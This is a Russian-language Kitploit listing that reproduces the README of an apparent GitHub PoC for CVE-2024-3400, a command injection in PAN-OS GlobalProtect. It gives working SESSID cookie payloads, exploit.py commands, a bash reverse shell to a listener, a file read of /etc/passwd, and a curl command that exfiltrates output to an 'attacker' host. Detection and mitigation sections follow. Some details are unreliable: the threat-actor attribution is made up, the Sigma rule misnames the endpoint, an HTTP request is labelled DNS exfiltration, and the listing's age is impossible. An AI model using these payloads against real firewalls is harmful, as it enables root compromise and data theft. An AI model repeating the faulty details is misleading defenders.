Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-3400-panos_rce_reproduction — Воспроизведение cve-2024-3400-panos_rce_reproduction | Kitploit
Инструменты/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Воспроизведение cve-2024-3400-panos_rce_reproduction

Репозиторий
112 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-3400: Инъекция команд в Palo Alto PAN-OS GlobalProtect и удалённое выполнение кода (RCE)

CVSS 10.0 КРИТИЧЕСКИЙ | CWE-78: Инъекция OS-команд | Массово эксплуатируется в дикой природе


Обзор

CVE-2024-3400 — это уязвимость инъекции команд без аутентификации в интерфейсах портала и шлюза GlobalProtect в Palo Alto Networks PAN-OS. Уязвимость позволяет неаутентифицированному злоумышленнику выполнять произвольные команды с привилегиями root на затронутом межсетевом экране.

  • Обнаружена: Volexity (апрель 2024)
  • Атрибуция: UNC4554 / Midnight Blizzard (спонсируемый российским государством)
  • CVE ID: CVE-2024-3400
  • Оценка CVSS: 10.0 (критическая)
  • CWE: CWE-78 (некорректная нейтрализация специальных элементов, используемых в OS-команде)
  • Воздействие: полная компрометация межсетевых экранов PAN-OS, горизонтальное перемещение, развёртывание программ-вымогателей
  • Статус: активно эксплуатировалась как 0-day до публичного раскрытия

Технические детали

Корневая причина

Уязвимость кроется в обработке сессионных cookie компонентом портала и шлюза GlobalProtect. Функция, отвечающая за обработку cookie SESSID, не выполняет надлежащую санитизацию пользовательского ввода перед передачей его в shell-команду.

В частности, неаутентифицированный HTTP-запрос к конечной точке портала GlobalProtect (/global-protect/login.esp) со специально сформированной cookie SESSID, содержащей встроенные метасимволы shell (обратные кавычки и подстановку переменных), приводит к инъекции команд.

Механизм инъекции

Уязвимый путь выполнения кода работает следующим образом:

  1. Портал GlobalProtect получает запрос к /global-protect/login.esp
  2. Значение cookie SESSID извлекается без санитизации
  3. Это значение подставляется в строку shell-команды
  4. Команда выполняется через system() или аналогичную функцию выполнения OS-команд
  5. Поскольку приложение работает с правами root, инъекционная команда выполняется с полными системными привилегиями

Конструирование полезной нагрузки

Инъекционная полезная нагрузка использует команды, заключённые в обратные кавычки, внутри cookie SESSID:

SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

Обход пути (/../../../) позволяет выйти за пределы целевого каталога, а часть COMMAND, заключённая в обратные кавычки, заставляет shell выполнить ввод злоумышленника. Для эксфильтрации результатов команд могут использоваться перенаправление вывода или механизмы reverse shell.


Затронутые версии

Версия PAN-OSЗатронутые версииИсправлено в
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h1011.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3

Примечание: PAN-OS 9.x и более ранние версии не затронуты. Cloud NGFW и Prisma Access не затронуты.


Эксплуатация

Вектор атаки

  • Сеть: удалённый
  • Аутентификация: не требуется
  • Требуемые привилегии: не требуются
  • Взаимодействие с пользователем: не требуется
  • Воздействие: полная компрометация конфиденциальности, целостности и доступности

Наблюдаемая активность субъекта угрозы

UNC4554 / Midnight Blizzard (APT29) эксплуатировала CVE-2024-3400 как 0-day начиная с марта 2024 года. Компания Volexity опубликовала свой анализ 12 апреля 2024 года. Паттерны атак включали:

  1. Первоначальный доступ: массовое сканирование открытых порталов GlobalProtect
  2. Выполнение команд: развёртывание кастомных Python-бэкдоров через вектор инъекции в cookie
  3. Закрепление: установка бэкдора UPSTYLE, кража учётных данных, извлечение конфигурации
  4. Горизонтальное перемещение: использование скомпрометированных межсетевых экранов в качестве плацдарма во внутренние сети
  5. Эксфильтрация данных: кража конфигурационных файлов, VPN-учётных данных и сессионных токенов
  6. Программы-вымогатели: множественные инциденты развёртывания программ-вымогателей после первоначальной компрометации

Доступность Proof-of-Concept

Опубликовано несколько публичных PoC. Данный репозиторий предоставляет работоспособный эксплойт для авторизованного тестирования.


Шаги воспроизведения

Требования

  • Python 3.8+
  • библиотека requests
  • Цель: Palo Alto PAN-OS с открытым уязвимым порталом GlobalProtect
  • Только при наличии авторизации

Установка

pip install requests

Базовый эксплойт

python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Пример reverse shell

# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Чтение произвольных файлов

python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Proof-of-Concept (curl)

# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

PoC-скрипт

См. exploit.py в этом репозитории — полнофункциональный Python-эксплойт со следующими возможностями:

  • Выполнение произвольных команд
  • Поддержка прокси (Burp Suite / mitmproxy) — опционально
  • Управление проверкой SSL
  • Обработка таймаутов и повторных попыток
  • Анализ ответов

Обнаружение

Индикаторы компрометации (IOC)

  • Запросы к /global-protect/login.esp с аномально длинными или подозрительными cookie SESSID
  • Cookie, содержащие последовательности обхода пути (/../../) в сочетании с обратными кавычками
  • Неожиданные процессы, запускаемые компонентом GlobalProtect
  • Исходящие подключения от межсетевого экрана к неизвестным IP-адресам на нестандартных портах
  • Файлы с расширением .py, записываемые в /opt/panlogs/tmp/device_telemetry/

Sigma-правило (упрощённое)

title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Смягчение последствий

Немедленные действия

  1. Обновите PAN-OS до исправленных версий, указанных выше
  2. Если немедленное обновление невозможно, примените один из следующих обходных путей:
    • Отключение телеметрии устройства: set deviceconfig system telemetry disable yes (блокирует уязвимый путь выполнения кода без перезагрузки)
    • Контроль доступа к порталу/шлюзу GlobalProtect: ограничьте доступ доверенными исходными IP-адресами
  3. Проверьте на компрометацию: проверьте наличие несанкционированных файлов в /opt/panlogs/tmp/device_telemetry/
  4. Просмотрите журналы: проверьте журналы входа GlobalProtect на предмет аномальных значений cookie SESSID

Постоянное исправление

Примените исправление (hotfix), предоставленное Palo Alto Networks. Исправление выполняет надлежащую санитизацию ввода cookie перед формированием shell-команды.

Оценка компрометации

Если вы подозреваете эксплуатацию:

  1. Соберите криминалистические образы затронутых межсетевых экранов
  2. Проверьте все изменения конфигурации (метки времени последнего изменения)
  3. Просмотрите запущенные процессы и задания cron
  4. Проверьте наличие несанкционированных SSH-ключей и учётных записей
  5. Смените все VPN-учётные данные и общие секреты
  6. Проанализируйте сетевой трафик на предмет паттернов C2-взаимодействия

Ссылки

Скачать инструмент